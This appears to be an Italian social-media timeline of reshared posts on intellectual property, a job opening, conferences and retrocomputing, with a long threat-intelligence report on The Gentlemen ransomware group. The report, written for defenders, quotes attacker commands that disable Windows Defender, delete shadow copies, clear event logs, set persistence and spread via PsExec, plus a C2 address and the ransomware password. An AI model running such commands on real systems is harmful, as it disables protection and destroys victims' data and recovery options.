in reply to Claudia

credo Che l'hardware per Farsi le AI in casa non sia ( ancora )abbastanza diffuso. Quando I'll pubblico avrà contezza Della differenza tra in modello 13B e uno 80B , certe cose saranno immediate per tutti.

--
Uriel Fanelli
Using Aktor: git.keinpfusch.net/loweel/Akto…
XMPP: uriel@keinpfusch.net
old blog: blog.keinpfusch.net
new blog: keinpfusch.net

Questa voce è stata modificata (1 mese fa)

GPT-5.6 Sol, la nuova frontiera dell’AI per la cyber: ecco cosa cambia per i defender


@Informatica (Italy e non Italy)
OpenAI ha annunciato la preview di GPT-5.6 Sol, il suo modello AI più avanzato per la cyber security. Capacità di vulnerability research superiori, safety stack inedito e rilascio controllato con supervisione governativa USA. Un’analisi per

Cybersecurity & cyberwarfare ha ricondiviso questo.

Dati della sperimentazione clinica fra apertura e chiusura

#dataexclusivity Leggere testi giuridici e scientifici è noioso e richiede un notevole consumo di tempo. Sulla base di questa faticosa lettura poi posso distillare un saggio o un articolo a sostegno di una tesi, eventualmente interessante e originale. Ma il testo frutto del mio lavoro può essere citato da un collega che, fidandosi di me, non ha fatto tutta la mia fatica, e magari, per ragioni contingenti, ci fa pure una figura più bella.

Quindi, se l'Unione Europea riconosce alle aziende farmaceutiche un periodo di esclusiva sui dati della sperimentazione clinica che fra una cosa e l'altra può durare fino a 11 anni, anch'io voglio un periodo di esclusiva legale per il quale nessuno, per almeno 8 anni, è autorizzato a citare il mio articolo a meno che non dimostri di aver letto tutti i testi che io ho, a mia volta, citato.

Vi torna? Se sì, potete leggere doi.org/10.5281/zenodo.2091860… (anche su ledizioni.it/prodotto/i-dati-d…), magari saltando alla conclusione.

Se no, potete farne a meno, e magari deplorare lo spreco di denaro pubblico connesso al finanziamento di una ricerca i cui risultati lo stato italiano e l'Unione europea, faranno, a essere ottimisti, soltanto finta di ascoltare.

E se volete potete perfino citare subito il libro in giro: noi non siamo, infatti, un'azienda farmaceutica.

Buona lettura (o no).

Questa voce è stata modificata (1 mese fa)
in reply to Tiberio

@Tiberio Da qualche parte nel libro c'è scritto che la parte più costosa della ricerca farmaceutica è la sperimentazione clinica richiesta perché il farmaco sia autorizzato. Questa sperimentazione è ora fatta da privati, e i suoi dati sono tutelati con la famigerata esclusiva, che si aggiunge ai brevetti, se ci sono, ma può anche esistere senza.

Il risultato è che Big Pharma sceglie che cosa sperimentare e che cosa no: per esempio tipicamente non le interessano farmaci che curano malattie da poveri, come quelle tropicali, né antibiotici e altre medicine che fanno guarire i pazienti, La guarigione infatti è un problema per chi vuol trar lucro dalla malattia .

Perfino in un regime di ricerca anche (ma non solo) privato, basterebbe che la sperimentazione di cui sopra fosse a carico e a scelta del pubblico, così da selezionare farmaci che curano i malati e non invece i portafogli di Big Pharma e dei suoi irresponsabili azionisti.

Perché nessuno ci pensa? Perché i legislatori del cosiddetto occidente amano troppo la proprietà intellettuale (e soprattutto - vai a capire perché - i grandi proprietari intellettuali) per rendersi conto che la cosiddetta PI non è solo un furto, ma un'idea ab origine gravemente incoerente e, come tale, esposta all'abuso.

in reply to Maria Chiara Pievatolo

tutto vero, ma se vogliamo il capitalismo dobbiamo accettare la PI, le disuguaglianze, le guerre ed i genocidi, perché sono i fondamenti su cui si regge questo sistema di valorizzazione del capitale, come scrive da tempo Clara Mattei nei suoi saggi da Tulsa in Oklahoma, tra cui :"Fuga dal Capitalismo" oppure nel precedente e più corposo "Operazione austerità". Il tempo delle analisi che non partono dal superamento del sistema di rapporti sociali in cui viviamo è scaduto
Cybersecurity & cyberwarfare ha ricondiviso questo.

#StegoAd: How 119 Fake Browser Extensions Stole Credentials and Ran Ad Fraud for Two Years
securityaffairs.com/194409/mal…
#securityaffairs #hacking #Ukraine #Russia
Cybersecurity & cyberwarfare ha ricondiviso questo.

Ugone:
Intanto breve presentazione: sono Giovanni P. Caruso, tecnologo presso l'Istituto per le Tecnologie didattiche del CNR di Genova. Il Consiglio Nazionale delle ricerche è l'ente italiano più grande che si occupa di fare ricerca su vari temi;
Il posto bandito con procedura concorsuale (siamo una PA) è per un posto a tempo indeterminato da tecnico IT.

CONCORSO PUBBLICO PER TITOLI ED ESAMI PER L’ASSUNZIONE CON CONTRATTO DI LAVORO A TEMPO PIENO E INDETERMINATO DI N. 1 UNITÀ DI PERSONALE PROFILO COLLABORATORE TECNICO ENTI DI RICERCA, VI LIVELLO PROFESSIONALE PRESSO L’ ISTITUTO PER LE TECNOLOGIE DIDATTICHE (ITD) DEL CONSIGLIO NAZIONALE DELLE RICERCHE CON SEDE A GENOVA.

selezionionline.cnr.it/jconon/…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Pronti per il DevConf Italia? La prima conferenza italiana per sviluppatori / creatori di codice Open Source prende il via. Il 7 e 8 Luglio ci vedremo presso il Learning Space Cravino, ubicato in Via Agostino Bassi 2 a Pavia per boostmedia.it/news/2026/06/pro…
Cybersecurity & cyberwarfare ha ricondiviso questo.

In #UK è stata lanciata un’azione collettiva contro #Apple: l’oggetto è #iCloud

Si contesta l’impossibilità di effettuare backup di #iPhone e #iPad su servizi alternativi, costringendo gli utenti a usare il cloud proprietario di Apple

Per 40 milioni di utenti e un danno stimato di £ 77 a persona, si tratta di una richiesta di 3 miliardi di sterline

Sarebbe interessante ripetere l’iniziativa

Le info si trovano qui: which.co.uk/news/article/which…

#bigtech

@internet

HamsterOS Crams Complete Graphical Desktop onto 1.44 MB Floppy


The media in this post is not displayed to visitors. To view it, please log in.

It’s not every day that there’s a new OS in the works for 386 and 486-era hardware, but [John Swiderski] let us know he working hard to bring HamsterOS to retrocomputing enthusiasts everywhere.
HamsterOS targets a November 2026 release.
HamsterOS is a tiny but full-featured multitasking 32-bit graphical operating system that fits on a single 1.44 MB floppy disk. It’s designed as a floppy-first OS, but can easily be installed to a hard drive and includes a suite of native applications. There’s even DOS support!

The list of features is impressive, many of which are targeted at making life a little easier for those working with vintage hardware. One example we like is the CMOS crash counter, which automatically forces the system into a basic VGA safe mode after three consecutive failed boot attempts.

Speaking of making vintage computing a little easier to handle, [John] also released HamsterWeazle, a free GUI front-end for Greaseweazle, the open-source USB device that makes interfacing to old floppy drives easy. If you’re finding yourself intrigued by software like HamsterOS but wondering how you’d write to a 1.44 MB floppy without already having some old hardware up and running, Greaseweazle over USB — and HamsterWeazle to make it much more user-friendly — is one way you’d do it.

We recently featured GentleOS, a charming and streamlined graphical OS aimed at vintage hardware that makes a point of showing what’s possible when new ideas meet old hardware. If you have a retrocomputing project you want to show off, custom OS or otherwise, let us know on our tips line!


hackaday.com/2026/06/29/hamste…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Age verification isn't about protecting children. It's a surveillance infrastructure dressed in child safety rhetoric, designed to automatically match your words to your real identity so authorities can find you faster. Don't volunteer that.

nonogra.ph/age-verification-is…

reshared this

The Gentlemen are knocking: сustom backdoors and evolving tactics


The media in this post is not displayed to visitors. To view it, please log in.


Introduction


This year saw the emergence of The Gentlemen, a prominent example of a group operating under the ransomware-as-a-service (RaaS) model. Although our initial assessment suggested the group first appeared in mid-2025, it actually started ramping up its activities at the beginning of 2026. According to public reports, in the first half of 2026, this group ranks among the top 10 ransomware actors by the number of victim announcements on its data leak site (DLS).

We have been observing the activity of The Gentlemen since February 2026 and have discovered new tactics, techniques, and procedures (TTPs) as well as custom tool development efforts, as they target large corporations and critical infrastructure worldwide. In our research, we have uncovered the group’s methods of reconnaissance, network sniffing, and many other techniques that have not been publicly described before by the wider community.

Technical details

Initial infection vector


The Gentlemen group and its affiliates usually get into victim systems by exploiting vulnerabilities in online services and using stolen or weak login credentials, as reported by multiple cybersecurity vendors. They often target devices like hardware VPNs and firewalls that are exposed to the internet, and use leaked or default credentials to gain access.

We believe the group is likely collaborating with other actors or initial access brokers (IABs) to gain access to the target organizations. While they often deploy ransomware within a few hours after initial access is obtained, our analysis of several attacks revealed some cases, in which access to the victim’s system had been established long before the ransomware was deployed. These cases involved tactics that are not typically associated with the group. This suggests that the initial breach may not have been executed by The Gentlemen at all, but rather by another group or an initial access broker.

Reconnaissance


Our investigation reveals that The Gentlemen conduct thorough internal reconnaissance using tools like SharpADWS, NetScan, Advanced IP Scanner, and netsh to map the target environment and identify vulnerabilities. SharpADWS is used to gather detailed Active Directory information, including domain object enumeration, and can bypass standard logging by wrapping LDAP queries in SOAP messages. The group also uses NetScan and Advanced IP Scanner to scan the network, discover active ports and services, and identify potential vulnerabilities, ultimately gaining a deeper understanding of the network and establishing remote control over identified systems.

Microsoft’s netsh tool is used to capture network packets and gather intelligence, executing the command cmd.exe /Q /c netsh trace start capture=yes report=no filemode=circular overwrite=yes maxSize=4 > \<target IP>\ADMIN$\{RANDOM-FILE-NAME} 2>&1 to start the capture, and cmd.exe /Q /c netsh trace stop > \<target IP>\ADMIN$\{RANDOM-FILE-NAME} to stop it.

The captured data is saved to a shared administrative folder with a random name, and can be analyzed with tools like Wireshark to reveal sensitive information such as unencrypted network activity and potential passwords, which the attackers then use to conduct targeted ransomware attacks.

Lateral movement


The Gentlemen group leverages the NETLOGON share to distribute the ransomware executable to connected computers, enabling simultaneous attacks on multiple devices. To facilitate lateral movement, they use a customized PowerShell script, deploy_gpo.ps1, with specific parameters and variables for each target system. Additionally, they employ PsExec to remotely execute the ransomware binary on targeted systems, providing an alternative method for spreading the infection when the GPO-based approach is not feasible.

Disabling security products


The Gentlemen group uses various methods to disable security software on targeted computers, including the BYOVD technique. This involves installing a vulnerable driver and exploiting its weakness to shut down security software, gain unrestricted access, and launch ransomware attacks. We observed the following vulnerable drivers used in the group’s attacks.

Driver nameDescription
ProcessMonitorDriver.sysSafetica DLP and EDR driver
wamsdk.sysWatchDog anti-malware driver
gamedriverx64.sysFedeen/Hotta studio anti-cheat driver
biontdrv.sysParagon partition manager driver
inpoutx64.sysA legacy driver involved in managing RGB lighting
wsftprm.sysTopaz anti-fraud software driver
Havoc.sysHuawei audio driver

The Gentlemen group also uses open-source tools, including Windows Kernel Explorer and OpenArk64, to disable security software. These tools can intercept and block system calls, and even remove security drivers, allowing the attackers to bypass security measures and remain undetected.

Besides this, the group employs simple methods to disable security software, such as using kavrmvr.exe to uninstall Kaspersky Antivirus, which is prevented by the product’s behavioral detection, and modifying Windows registry settings to disable Windows Defender’s real-time protection.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=dword:00000001
"DisableOnAccessProtection"=dword:00000001
"DisableScanOnRealtimeEnable"=dword:00000001

Last but not least, the attackers attempt to disable Windows Defender’s real-time monitoring and ransomware protection, and add itself to the exclusion list, by executing multiple PowerShell cmdlets, as observed in the Go implant, which we’ll analyze later in this post:

Set-MpPreference -DisableRealtimeMonitoring $true -Force
Set-MpPreference -EnableControlledFolderAccess Disabled -Force
Add-MpPreference -ExclusionProcess <file_name>
Add-MpPreference -ExclusionPath 'C:\\'

Go-based backdoor


We observed a custom-made implant, written in Go and deployed a day before the ransomware attack, which acted as a backdoor, enabling remote command execution. The implant collected system information (hostname, domain name, UUID, and local IP addresses) and organized it into a JSON format using a map structure with keys like name, domain, uuid, and localIPs. To obtain the system’s UUID, it used the WMI query "SELECT UUID FROM Win32_ComputerSystemProduct". It then used the Yamux library to establish a persistent bidirectional TCP connection with the C2 server at 81.177.215[.]15:9443. It sent the collected system info to the C2 and waited for operator responses, executing commands using cmd.exe /c if the response byte was 'c', or establishing a SOCKS proxy connection if the byte was 's'. This functionality likely enables The Gentlemen’s red team to pivot within the target network and expand their scan coverage.

Given the backdoor implant’s capabilities, such as establishing two-way communication, executing commands, setting up a SOCKS proxy, and gathering information, it’s clear that it can also be used to expand the attack chain as needed. In one incident, soon after the initial connection was made, we saw the server send reconnaissance commands, including:

whoami
net group \"Domain Admins\" /domain
net group
dir c:\\
cd c:\\

Go-based ransomware


The most widespread version of the ransomware binary, written in Go, emerged in mid-2025 and has been used in most attacks since then. It features a previously unknown Go obfuscator that renames symbols, source code files, and structures, and alters function signatures, making analysis more difficult. The binary also contains embedded parameters with descriptions, indicating a sophisticated tool. The parameters are listed in the following table:

ParameterDescription
--passwordAccess password required to run the ransomware, acts as an anti-sandbox technique
--pathComma-separated list of target directories to be encrypted
--TDelay before the encryption starts, specified in minutes
--systemA flag to run as SYSTEM, encrypting only local drives
--sharesA flag to encrypt only mapped network drives
--fullA flag that combines --system and --shares
--spreadLateral movement flag using specified domain credentials (“domain.com\user:pass”) or a single space (” “) to leverage the current session
--gpoA flag to deploy via Group Policy to all domain computers (designed to be executed on a Domain Controller)
--silentSilent mode: skips renaming files, modifying file update times after encryption, and changing the wallpaper
--keepA flag that prevents the executable from self-deleting after the encryption process completes
--wipeA flag that enables wiping free disk space after encryption
--no-adminA flag to force execution without administrative privileges
–fastSpeed flag that restricts processing/encryption to 9 percent of the file
–superfastSpeed flag that restricts processing/encryption to 3 percent of the file
--ultrafastSpeed flag that restricts processing/encryption to 1 percent of the file
Automated system execution prevention


The Go variant of the ransomware is designed to avoid detection and prevent analysis. To execute, it requires a password, currently set to CbdU8EgF. This password acts as a barrier to prevent the binary from running in sandbox or automated environments. If the incorrect password is entered or no password is provided, the binary will terminate.

Lateral movement through GPO deployment


When the --gpo parameter is used, the ransomware spreads to other computers on the network through Group Policy. To do this, it generates PowerShell commands based on the target environment, writes them to a file called deploy_gpo.ps1 in the %temp% folder, and executes it.

The resulting script allows the attackers to quickly spread the ransomware across the entire company network. It starts by finding the Domain Controller and loading tools to control it. Then, it copies itself to the NETLOGON network folder to become accessible to all computers.

To prevent the attack from being blocked, the script creates a fake system update policy that disables Windows Defender. It does this by changing the DisableRealtimeMonitoring setting to 1 on all connected computers, thereby disabling real-time scanning and security features. The script also sets up a hidden task by creating a ScheduledTasks.xml file in the SYSVOL directory and modifies the Active Directory property gPCMachineExtensionNames to register the malicious XML file. Finally, the script forces all computers on the network to update their rules immediately by running the gpupdate /force command, causing all computers to download and run the ransomware simultaneously.

Lateral movement through PsExec


In addition to spreading through Group Policy, the ransomware also uses PsExec for lateral movement when the --spread parameter is provided. If PsExec is absent on the target system, it downloads the tool using the following command:
powershell.exe -Command "Invoke-WebRequest -Uri 'https://live.sysinternals[.]com/PsExec.exe' -OutFile 'C:\Temp\psexec.exe'"

The ransomware then performs a thorough scan of the domain by installing and using Remote Server Administration Tools (RSAT) through a PowerShell cmdlet. If the PowerShell commands fail, it uses the NetServerEnum API instead.

try {
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -ErrorAction Stop
}
catch {}

try {
DISM.exe /Online /Add-Capability /CapabilityName:"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
}
catch {}

try {
Install-WindowsFeature RSAT-AD-PowerShell -ErrorAction Stop
}
catch {}

try {
Import-Module ActiveDirectory -ErrorAction Stop
Get-ADComputer -Filter * | Select-Object -ExpandProperty Name
}
catch {}

Once it has obtained a list of all computers on the domain, the ransomware checks if each computer is active by pinging it with the command ping.exe -n 1 -w 500 {target}. If a computer is found to be active, the ransomware uses PsExec to spread to that computer.

Pre-encryption activities


Before starting to actually encrypt files, the ransomware attempts to stop any active Hyper-V virtual machines, allowing it to encrypt the virtual disk files. It uses PowerShell commands to achieve this, including:

Get-VM | Stop-VM -Force -TurnOff
Get-VM | Where-Object State -eq 'Running' | Stop-VM -Force -TurnOff

The ransomware also terminates specific processes using taskkill.exe and disables and stops certain services using sc.exe. The lists of processes and services are quite long and include various popular software, such as Microsoft Office instances, database management interfaces, remote management software, backup applications and more.

After stopping and terminating all the services and processes from the lists, the ransomware ensures its persistence on the system by:

  • Deleting and recreating a scheduled task called “UpdateUser” to run the ransomware on startup
  • Adding a registry key to run the ransomware on startup

The commands used for this are:

schtasks.exe /Delete /TN "UpdateUser" /F
schtasks.exe /Create /SC ONSTART /TN "UpdateUser" /TR "<ransomware_path>"
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GupdateS" /t REG_SZ /d "<ransomware_path>" /f

Encryption process


After completing its preparations, the ransomware begins encrypting files using a hybrid encryption algorithm that combines Curve25519 and the XChaCha20 stream cipher. For each file to be encrypted, it generates a Curve25519 key pair and computes a shared secret with the attacker’s public key embedded in its code and encoded in Base64 as HvzC6Dq/siFthWSgE5ozZyQDu9cyxIoxb3NuRHI6pDM=.

Before encrypting the files, the ransomware changes the file access permissions to “Everyone” and gains full administrative access by overriding the file’s Access Control List (ACL) and Access Control Entry (ACE) using the following commands:

  • takeown.exe /f <target_file> /d y
  • icacls.exe <target_file> /grant *S-1-1-0:F

The ransomware also includes a list of blacklisted directories, files, and extensions to prevent encryption of essential system components.

As the encryption process begins, the ransomware creates a file named README-GENTLEMEN.txt in each directory, containing the ransom note with the victim ID, Tox ID, and Data Leak Site address. If the --silent parameter is not provided, it also changes the desktop wallpaper to The Gentlemen’s embedded image.

The Gentlemen background image
The Gentlemen background image

After completing its operations, the ransomware may delete free space on the system to hinder data recovery attempts if the --wipe parameter is provided. Additionally, it may delete itself if the --keep parameter is not provided.

Regardless of provided parameters, it also deletes various system files and logs to cover its tracks, using commands such as:

vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete
wevtutil.exe cl System
wevtutil.exe cl Application
wevtutil.exe cl Security

Additionally, it deletes files from various directories, including:

cmd.exe /C del /f /q C:\Windows\Prefetch\*.*
cmd.exe /C del /f /q C:\ProgramData\Microsoft\Windows Defender\Support\*.*
cmd.exe /C del /f /q %SystemRoot%\System32\LogFiles\RDP*\*.*
cmd.exe /C rd /s /q C:\$Recycle.Bin

C-based ransomware


As The Gentlemen’s operations have extended, multiple researchers from different information security vendors have identified two ransomware implant versions: the cross-platform Go variant described above and a C-based ESXi locker for Linux. Our investigation has also uncovered a new, still-in-development C implant, currently limited to Windows.

This new ransomware variant has been observed in a limited number of attacks on organizations. While the overall malware structure remains similar to the Go variant we have described, the encryption algorithm has undergone significant changes, suggesting The Gentlemen group is expanding its capabilities. We believe this variant is still in development and being tested on a small subset of victims, with several parameter options, outlined below.

ParameterDescription
--passwordThe ransomware needs a password to execute, which is meant to prevent execution on automated systems
--removeThe ransomware removes itself after the encryption process has been finished
--TSleep time before encryption, in seconds
--exLikely stands for excluded objects (not implemented)
--fastEncryption speed option (not implemented)
--superfastEncryption speed option (not implemented)
--ultrafastEncryption speed option (not implemented)
--silentLikely silent execution (not implemented)
--systemExecute with system privileges. Could be used to encrypt local disks, as in the Go variant, but at the time of writing this article, there isn’t sufficient data to support this.
--sharesEncrypt the shares connected to the system (not implemented)
--fullFull encryption (not implemented)
--pathDirectory list to be encrypted

As can be seen from the parameter list, some of the parameters are not yet implemented. We anticipate that this variant will mature and likely be increasingly used in future attacks. Notably, the C variant uses smaller denylists of files, directories and extensions compared to the Go variant, which further suggests that this version of the ransomware is still in development. For example, the list of files that should not be encrypted, contains only three items, one of which is the group’s ransom note.

To execute with elevated privileges when receiving the --system parameter, the implant creates a scheduled task called “TaskSystem” using the command schtasks /create /sc DAILY /tn "TaskSystem" /tr "cmd /C cd %s && %s" /st 20:00 /ru system > nul. It then runs the task with elevated privileges using schtasks /run /tn TaskSystem > nul. If “TaskSystem” exists in the target system, the ransomware first deletes it using schtasks /delete /tn TaskSystem /f > nul, before creating a new one with the same name.

If the ransomware lacks sufficient privileges to access a file, it attempts to modify the file’s ACL by granting FULL_CONTROL permission and setting a new EXPLICIT_ACCESS_A structure using the SetEntriesInAclA API call.

For encryption, the ransomware uses the OpenSSL library, which is statically linked to the binary. Unlike the Go variant, this variant uses the AES256-GCM + RSA encryption scheme. It generates a random 32-byte key and a 16-byte initialization vector (IV) for each file, creating a 48-byte buffer. This buffer is then encrypted using a hardcoded RSA public key and appended to the file. The file’s contents are encrypted with AES256-GCM and written after the encrypted key and IV.

After encrypting all files in a directory, the ransomware decodes a byte array using single-byte XOR decryption and creates a file named !-READ-ME—-GEN-TLE-MEN-!.txt in the directory. It then writes the decoded byte array, which contains the ransom note, to the file.

The ransom note in this version of the ransomware reveals a difference from earlier Go versions: communication with the operators is now conducted via email rather than through Tox Messenger.

After completing the encryption process, the ransomware attempts to clear logs from various event log categories, including System, Forwarded Events, Application, and Setup, using the EvtClearLog API. However, it appears that there may be an error in the event log clearing process, as the category "S" is not a valid default entry for an event log category, suggesting a possible typo or missing parameters.

Event clearing function
Event clearing function

Victims


The Gentlemen target a wide range of industries worldwide, including manufacturing, IT services, healthcare, financial services, construction, and logistics. Observed intrusions span several regions, with Brazil, China, Indonesia, Taiwan, and Thailand among the most heavily targeted countries and territories according to our telemetry.

Attribution


We have high confidence in attributing the observed activities to The Gentlemen group and its affiliates. This attribution is based on several key factors, including the consistent use of the group’s name, associated email addresses, and Data Leak Site within the binaries and ransom notes.

Conclusion


The Gentlemen group is rapidly gaining traction in the ransomware landscape, recruiting affiliates and executing high-profile attacks. Their adaptability is evident in the emergence of a C-based ransomware variant, a Go-based backdoor enabling remote command execution, and customized scripts tailored to specific targets. Recent data leaks exposing internal communications and operational plans suggest the group will continue to engage in malicious activity. Organizations are advised to prioritize vulnerability management and system hardening to reduce the risk of compromise.

Indicators of compromise

Go ransomware


3B46A729DB7AE6AF8B19711C9452194D locker_eryoo5_windows_amd64
02944C8A5535CDB5B2CBB893DB2D5ACF locker_lqy8xb_windows_amd64.exe
10CA9A4040001560D053B7E7885C1B95 locker_28f3cl_windows_386.exe
3C471EBC947CDF32240A90FFADF49B13 locker_aga19g_windows_amd64.exe
4BE8BB62F0EBBCF4CE52C35AB6F794F5 locker_wh54td_windows_386.exe
53C616677BC7E2A0A03127F19166D007 locker_p663zs_windows_amd64.exe
5C3B9821FC82A9028CB63B9671950919 locker.exe
5F0B2C6D9F442754258BF4DD841C8341 locker_t1zged_windows_amd64.exe
608FAF58353B65C45EF9833358AC3787 locker_u90lyt_windows_amd64.exe
6AE7C9A7EA0B8C40A64225734F6BD01D gentle.exe
846DC77C1246DB20D976346E0E359502 locker_p663zs_windows_386.exe
ADAC9984B3CC43D66A0D33079BBEC299 UcAaJ_o_1j9srso9a14071ps4p7s3f81s1b
AE0E536766788478263BF448A9381641 cosmo.exe
B3E418D30312C1B2C58A791286868F42 system_386.exe
C2764744DCB4B0E1DB79CA1E8BF65368 getlwd.exe
D12A5B36DD00586CC374A1CAE43EFED4 locker_c65ffp_windows_amd64.exe
D2F72897E8986303D5567EB2384932B8 UcAaJ_o_1j9srso9a14071ps4p7s3f81s1b
DE1522F9219497632F30F8A6E72F26B6 locker_c7ekh7_windows_amd64.exe
FDAE2BEB813778B4540A997706862096 AIR.exe

C-based ransomware


B9986A0F1F1F1A798DC3F0C59A80A1A3 fin.exe

Backdoor


554E699C96B332468F1AE69C1AE81EF9 sihost.exe

Vulnerable drivers


5761BD63DA03686FC480245DA7BD1E9F processmonitordriver.sys
B6B51508AD6F462C45FE102C85D246C8 wamsdk.sys
8F0577D28C4FF5F71B149F444BFABA8E gamedriverx64.sys
525EF6014F0EF20E44FE47C1D9980B69 biontdrv_wink.sys
407B6A136BBAA7172EB44EF9D08BB58A biontdrv_winbs.sys
9321A61A25C7961D9F36852ECAA86F55 inpoutx64.sys
73F0A8C3EA794A04E80C32038249F044 wsddprm.sys
EEF8A950952696B018AA9C6DA2F5D7AD havoc.sys

Scanning tools


EDB1C480295250DD1A38F3AA1357DEAE netscan64.exe
5537C708EDB9A2C21F88E34E8A0F1744 Advanced_IP_Scanner_2.5.4594.1.exe

File paths


\\Netlogon\
C:\Sharing
C:\Temp
C:\Netlogon
C:\Windows\sysvol\domain\scripts\
%TEMP%
%User%\Downloads
%User%\Desktop

Domain and IPs


81[.]177[.]215[.]15 Backdoor C2


securelist.com/the-gentlemen-r…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

⚠️ UAE warns abandoned accounts become attack surfaces

The #UAE Cybersecurity Council urged citizens to erase unused digital accounts, warning dormant profiles retain personal data that can be exploited for #identitytheft and #socialengineering.

🔗 read more: thecyberexpress.com/uae-cybersec...

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

Con ben due talk (sì ma, niente di serio), ho lo sbrilluccicante onore di partecipare.

Che non c'è, si merita il Governo attuale 😎


Pronti per il DevConf Italia? La prima conferenza italiana per sviluppatori / creatori di codice Open Source prende il via. Il 7 e 8 Luglio ci vedremo presso il Learning Space Cravino, ubicato in Via Agostino Bassi 2 a Pavia per boostmedia.it/news/2026/06/pro…

Cybersecurity & cyberwarfare ha ricondiviso questo.

#SSU and #FBI Uncover Russian Cyber Espionage Operation Against Officials and Military Personnel
securityaffairs.com/194399/int…
#securityaffairs #hacking #Ukraine #Russia